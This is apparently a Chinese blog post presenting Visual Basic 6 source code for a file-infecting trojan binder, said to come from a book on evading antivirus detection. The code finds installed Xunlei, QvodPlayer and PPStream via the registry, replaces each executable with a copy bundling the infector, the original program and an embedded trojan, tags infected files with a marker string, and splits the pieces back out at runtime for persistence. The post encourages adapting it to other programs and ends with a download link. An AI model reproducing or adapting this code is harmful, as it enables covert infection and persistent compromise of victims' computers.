gkroot以前买了本书《终极免杀》,书还不错,主要是看中了360免杀的专题。里面就讲了这个方法来自启动。
思路如下:
查找系统指定软件路径(用注册表),然后把木马与主程序捆绑并替换。有些程序会自身检测。这个就要靠你自己了。
源码中的资源文件放木马,源码感染的是迅雷,当然你可以改成别的!
核心模块代码;
vb decode:true">Function GanRanExe(ByVal sFilePath As String)
Dim MyArray() As Byte
Dim CurrentSize As Long
Dim FileArray() As Byte, FileArray1() As Byte
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
ReDim MyArray(LOF(1) - 1)
Get #1, , MyArray
Close #1
Open sFilePath For Binary Access Read As #1
ReDim FileArray(LOF(1) - 1)
Get #1, , FileArray
Close #1
FileArray1 = LoadResData(101, "CUSTOM")
Kill sFilePath
Open sFilePath For Binary Access Write As #1
Put #1, , MyArray
Put #1, , FileArray
CurrentSize = LOF(1)
Put #1, , FileArray1
Put #1, , "GanRanFileTbide" & UBound(MyArray) + 1 & "," & UBound(FileArray) + 1 & "," & CurrentSize & "," & UBound(FileArray1) + 1
Close #1
End Function
Function FenLiGanRanExe(ByVal FenLiToFilePath As String)
On Error Resume Next
Dim MyArray() As Byte
Dim FileArray() As Byte
Dim FenLiXinXi() As String
Dim FenLiXinXiSize() As String
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
ReDim MyArray(LOF(1) - 1)
Get #1, , MyArray
FenLiXinXi = Split(StrConv(MyArray, vbUnicode), "GanRanFileTbide")
FenLiXinXiSize = Split(FenLiXinXi(UBound(FenLiXinXi)), ",")
ReDim FileArray(FenLiXinXiSize(1) - 1)
Get #1, FenLiXinXiSize(0) + 1, FileArray
Close #1
Kill FenLiToFilePath
Open FenLiToFilePath For Binary Access Write As #1
Put #1, 1, FileArray
Close #1
End Function
Function FenLiGanRanExe1(ByVal FenLiToFilePath As String)
On Error Resume Next
Dim MyArray() As Byte
Dim FileArray() As Byte
Dim FenLiXinXi() As String
Dim FenLiXinXiSize() As String
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
ReDim MyArray(LOF(1) - 1)
Get #1, , MyArray
FenLiXinXi = Split(StrConv(MyArray, vbUnicode), "GanRanFileTbide")
FenLiXinXiSize = Split(FenLiXinXi(UBound(FenLiXinXi)), ",")
ReDim FileArray(FenLiXinXiSize(3) - 1)
Get #1, FenLiXinXiSize(2) + 1, FileArray
Close #1
Kill FenLiToFilePath
Open FenLiToFilePath For Binary Access Write As #1
Put #1, 1, FileArray
Close #1
End Function
Function TestGanRan(ByVal sFilePath As String) As Boolean
Dim FileArray() As Byte
Open sFilePath For Binary Access Read As #1
ReDim FileArray(LOF(1) - 1)
Get #1, , FileArray
Close #1
If InStr(StrConv(FileArray, vbUnicode), "GanRanFileTbide") > 0 Then
TestGanRan = True
Else
TestGanRan = False
End If
End Function
Public Function ReadReg(ByVal hKey)
On Error Resume Next
Set pReg = CreateObject("Wscript.Shell")
ReadReg = pReg.RegRead(hKey)
End Function
Function PanDuanpath() As Boolean
On Error Resume Next
Dim thunderPath
thunderPath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Thunder Network\ThunderOem\thunder_backwnd\dir")
If Dir(thunderPath & "\Program\Thunder.exe") <> "" Then
FrmMain.Combo1.AddItem thunderPath
FrmMain.Combo1.Text = thunderPath
Else
End If
Dim Qvodpath
Qvodpath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\QvodPlayer\Insert\Insertpath")
If Dir(Qvodpath & "/QvodPlayer.exe") <> "" Then
FrmMain.Combo1.AddItem Qvodpath
FrmMain.Combo1.Text = Qvodpath
Else
End If
Dim PPSpath
PPSpath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PPStream.exe\Path")
If Dir(PPSpath & "/PPStream.exe") <> "" Then
FrmMain.Combo1.AddItem PPSpath
FrmMain.Combo1.Text = PPSpath
Else
End If
End Function
源码下载
下载地址